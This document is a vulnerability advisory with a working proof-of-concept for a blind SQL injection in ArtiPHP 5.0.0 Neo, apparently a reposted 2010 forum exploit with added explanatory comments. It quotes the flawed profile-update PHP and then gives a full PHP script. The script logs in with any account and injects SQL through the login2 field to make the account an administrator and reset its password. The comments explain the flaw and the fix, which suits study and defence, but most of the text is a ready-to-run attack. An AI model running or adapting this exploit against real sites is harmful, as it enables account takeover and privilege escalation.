Product: ArtiPHP
Version: 5.0.0 Neo
Author: http://www.artiphp.com/
Blind SQL-Injection.
Requires: magic_quotes_gpc off.
File: artpublic/utilisateurs/modif_inscription.php
PHP code:
// Input "normalisation" for the profile-update form. Every field goes through
// htmlspecialchars() with its default flags, which converts <, >, & and the
// double quote but (before PHP 8.1, default ENT_COMPAT) leaves the single
// quote untouched. The values are then interpolated into single-quoted SQL
// literals further down, so this is HTML output encoding misapplied as SQL
// sanitisation: a quote in any of these fields terminates the SQL literal.
// All variables except $login2 are used without a visible $_POST lookup —
// presumably populated upstream (register_globals or extract()); not shown
// in this excerpt, confirm before relying on it.
$prenom = htmlspecialchars($prenom);
$nom = htmlspecialchars($nom);
$login = htmlspecialchars($login);
$login2 = htmlspecialchars($_POST['login2']);
$site = htmlspecialchars($site);
$url = htmlspecialchars($url);
$ville = htmlspecialchars($ville);
$metier = htmlspecialchars($metier);
$pass = htmlspecialchars($pass);
$pass2 = htmlspecialchars($pass2);
....
// The update only runs when both password fields are non-empty; the rest of
// the branch (and its closing brace) is not part of this excerpt.
if ($pass && $pass2) {
// ***** MODIF jimro ***** Added $passMD5 and modified query - 28/10/2005
// The password is stored both as an unsalted MD5 and via MySQL PASSWORD();
// neither is an acceptable password hash — password_hash()/password_verify()
// is the remedy.
$passMD5 = md5($pass);
// The UPDATE is assembled by string interpolation: $prenom, $nom, $pass,
// $login2, $site, $url, $ville, $metier and $SESSION_ID (presumably a
// session-derived id, not shown here) all land inside single-quoted literals
// with no SQL escaping. A quote in $login2 — which comes straight from $_POST
// above — closes the literal, so the caller can append its own SET
// assignments and WHERE clause and comment out the original one; that is
// exactly what the exploit published below does. Fix: a prepared statement
// with bound parameters, and an id_ugroup column that is never derived from
// request data.
$requete = "UPDATE " . ARTI_PREFIX_TB . "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'";
...
Target:
Expl0it:
PHP code:
<?php
/**
* @author m0hze
* @copyright 2010
* @{http://forum.antichat.net}
* @ Yeeeees, baby!
*/
// PoC configuration; the values are the placeholders from the original post.
$host = 'target.com'; // Target host name only (no scheme, no trailing slash)
$path = '/'; // Path of the application root on that host
$login = 'YouLogin'; // Login of an existing account
$password = 'Password?'; // Current password of that account
$newpass = 'NewPassword :)'; // Password the injected UPDATE writes for that account
$groupid = 1; // Value written to id_ugroup; the post states 1 is the administrator group
/**
 * Logs in as the configured account and returns its session cookie.
 *
 * Sends a raw HTTP/1.1 POST of login and pass to
 * artpublic/includes/verif_user.php, reads the whole response and treats any
 * response containing "index.php" as a successful login (presumably the
 * post-login redirect target — not verifiable from this script). On success
 * the value of the first Set-Cookie header, up to its first ";", is returned
 * with a trailing ";"; on failure the script dies.
 *
 * Defender note: the injection below is reachable only after this login, so
 * any registered account is a potential privilege-escalation path, and this
 * request looks like an ordinary form login from the server's point of view.
 *
 * @param string $login
 * @param string $password
 * @return string cookie header value for the following request
 */
function auth($login, $password)
{
global $host, $path, $authscript; // $authscript is declared but never read here
$newpath = $path . 'artpublic/includes/verif_user.php';
$data = 'login=' . $login . '&pass=' . $password;
$fp = fsockopen($host, 80); // plain HTTP on port 80
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);
// Collect the full response (headers and body) until the server closes.
while (!feof($fp)) {
$result .= fgets($fp, 128);
}
// Success heuristic: the response mentions index.php somewhere.
if (stripos($result, "index.php")) {
preg_match('#Set-Cookie:(.*);#iU', $result, $match);
//list($name,$value) = explode('=',$match[1]);
echo ("Authorisation: COMPLETE!...");
return (trim($match[1]) . ';');
} else {
die("Authorisation: FAILED!");
}
}
/**
 * Submits the profile-update form with an injected login2 value.
 *
 * The request is a normal POST to artpublic/utilisateurs/modif_inscription.php
 * carrying the cookie from auth(). Because the server interpolates login2 into
 * a single-quoted SQL literal without escaping, the value closes that literal,
 * appends its own SET assignments (id_ugroup, passUtilisateur,
 * passUtilisateurMD5), adds a WHERE on loginUtilisateur and comments out the
 * remainder of the original statement; the "+" characters become spaces when
 * the server decodes the form body. pass and pass2 are set only so the server
 * takes the branch that builds the UPDATE.
 *
 * Defender note: the request-level indicator is a profile field (here login2)
 * containing a quote, "id_ugroup" or a SQL comment marker; the durable fix is
 * a parameterised UPDATE and never taking id_ugroup from request data.
 *
 * @param string $cookie cookie header value returned by auth()
 * @return void
 */
function exploit($cookie)
{
global $host, $path, $authscript, $newpass, $groupid, $login;
$newpath = $path . 'artpublic/utilisateurs/modif_inscription.php';
// Form body; login2 carries the injected SQL fragment described above.
$data = "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" .
$newpass . "'),passUtilisateurMD5='" . md5($newpass) .
"'+where+loginUtilisateur='" . $login . "'+--+&login=$login&pass=1234&pass2=1234";
$fp = fsockopen($host, 80); // plain HTTP on port 80
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Referer: $referer\r\n");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);
// The response is not read; the script just reports what it tried to set.
// HTML line breaks: the script is meant to be run from a web context.
echo '<br>Login: ' . $login;
echo '<br>Password: ' . $newpass;
}
// Entry point: log in, then submit the injected update with the resulting cookie.
exploit(auth($login, $password));
?>